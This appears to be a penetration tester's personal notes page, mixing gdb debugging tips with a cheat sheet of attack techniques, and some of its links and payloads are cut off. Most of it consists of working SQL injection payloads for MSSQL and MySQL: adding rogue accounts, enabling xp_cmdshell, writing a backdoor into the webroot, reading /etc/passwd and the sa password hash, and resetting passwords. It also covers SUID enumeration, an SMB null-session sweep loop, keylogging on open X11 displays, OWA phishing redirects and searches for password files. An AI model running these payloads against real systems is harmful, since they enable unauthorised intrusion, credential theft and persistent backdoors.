Projects‎ > ‎



by filename from scratch:
$ sudo gdb /usr/sbin/programname
on already-running process:
$ sudo gdb /usr/sbin/programname 4860

(gdb) run
(gdb) generate-core-file
(gdb) detach

print stack (equivalent to 'backtrace' or 'bt' command):
(gdb) where

print lines of source code
(gdb) list

register values
(gdb) info reg

Hint: install relevant debug symbols package

useful links:

SQLi (mainly MSSQL and MySQL)

add flag as PoC:
CREATE TABLE pentester(was char(5),here char(5))
Verify by getting no errors (if vuln is error-based SQLi) when submitting a well-constructed query. i.e.:;SELECT * FROM pentester--
if the table was NOT created successfully, then you should get an error like:
Invalid object name "pentester"
add new account even if single and/or double quotation marks are filtered. Integers are converted to strings, so in this case the added username and password would be "666" (without quotation marks):
INSERT INTO users (user_id, username, password) VALUES (666,666,666)--
Traverse to table other than current one, and enumerate column names:;select%20*%20from%20users%20having%201=1--
And so on until no more similar SQL errors are returned

Get actual records. Note: SELECTed integers are dummy values to match the number of queried columns from the pre-UNION+SELECT statement:,0x3a,password),2,3,4,5,6,7+from+users--
Note: SQL server does not support the concat() function. Use the plus '+' operator instead.

Enable xp_cmdshell. Will only work if you have sa/dbo rights. Useful for SQL 2005 server:
EXEC master.dbo.sp_configure "show advanced options", 1
EXEC master.dbo.sp_configure "xp_cmdshell", 1



Then write your backdoor shell code on webroot. i.e.:
EXEC master..xp_cmdshell "echo EVIL_CODE_HERE>d:\inetpub\wwwroot"

Save arbitrary content on filesystem (useful to achieve remote command execution on MySQL servers):
SELECT "evil content" INTO OUTFILE "/path/to/backdoor.php";
Get user:
or 1=convert(int,(USER))--
Get sa hash on MS SQL 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
Get file contents ('/etc/passwd' in this case):
SELECT load_file('/etc/passwd');
Use double quotes if single quotes are filtered:
SELECT load_file("/etc/passwd");
If both single and double quotes are filtered, then hex-encode filename. Note: you can use CAL9000 "straight" hex encoder to retrieve other filenames (don't forget to prepend hex string with '0x'):
SELECT load_file(0x2F6574632F706173737764);
Examples of interesting payloads (useful for blind SQLi):
UPDATE users SET password="1234" WHERE id=1;
If target table is not on current database, then specify database name the target table belongs to:
UPDATE dbname.users SET password="1234" WHERE id=1;
Blind SQLi delay test:
waitfor delay '0:0:10';
Don't forget to test variations which depend of where the payload is injected in the original SQL statement. i.e.:;waitfor%20delay%20%270:0:10%27--
Blind SQLi boolean test:

 AND 1=1
 AND 1=0
Compare responses. i.e.: different content length, different errors in HTTP headers, etc.

Location of MySQL user hashes: table 'user' within 'mysql' database. i.e.:
SELECT Host,User,Password FROM mysql.user;
Location of *all* MySQL database names and table names: table 'TABLES' within the 'information_schema' database . i.e.:

Useful resources:

Command-line tools:

List of SQLi tools with brief reviews (in Spanish):

Debian/Ubuntu/GNU Linux

Search for package names based on keywords:
$sudo apt-cache search "Text-to-search"

$ sudo apt-cache search "mysql"
Example of network settings:
$ cat /etc/network/interfaces
auto lo
iface lo inet loopbackaddress

Finding world-writable files and directories
# find / -type f \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; 2>/dev/null >writable.txt
# find / -type d \( -perm -2 -o -perm -20 \) -exec ls -ldg {} \; 2>/dev/null >>writable.txt

Finding setuid files
# find / -type f \( -perm -004000 -o -perm -002000 \) -exec ls -lg {} \; 2>/dev/null >suidfiles.txt


Change DNS server settings permanently so they are not overwritten via DHCP:
- edit /etc/dhcp3/dhclient.conf
- uncomment supersede statement with desired settings. i.e.: supersede domain-name-servers,;
- restart networking. i.e.: sudo /etc/init.d/networking restart    

Outlook Web Access (OWA) 2003

Exchange admin:

Cross-domain redirect (redirect happens after clicking on "Log on", even if credentials are invalid):

For the following redirect, the credentials must be valid:

VBScript error by assigning a string to the 'reason' parameter (expects a numeric value):

Error returned in HTML:
Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "abc"]'

/exchweb/bin/auth/usa/logon.asp, line 542

Error returned in HTTP headers:
500 Internal Server Error

Advanced phishing: will show the fake login page after logging in while still on the legitimate site.

More info here:

Infrastructure pentesting

test cracked/found password via SMB:
smbclient \\\\targethost\\ipc$ -U username password
packages required for xkey.c: libxt-dev and probably x11proto-core-dev

if target is missconfigured and allows connections from any hosts. i.e.:

$ xhost +

then we can:
$ export DISPLAY=server-host-name:0.0
remember to try different display numbers:
declare -x DISPLAY=""
declare -x DISPLAY=""
etc ...

Depends on open ports. i.e.: display 1 on tcp/6000, display 2 on tcp/6001 and so on.

Then have fun with X tools. i.e.: xkey, xtv, etc ...

Compaq Insight Manager - now known as HP System Management
default passwords:
default login URL:

find hosts allowing null sessions in subnet
$ echo -en "\n" > returnchar.txt
$ for((i=1;i<255;++i));do echo -en "$i ";smbclient \\\\10.10.1.$i\\ipc$ "" -U ""<returnchar.txt;done;

Windows tricks/useful commands
find files containing a certain string in their name (case insensitive search):
dir \ /s /b | find /I "password"
find files containing a certain string (case insensitive search):
findstr /i /s "password" \*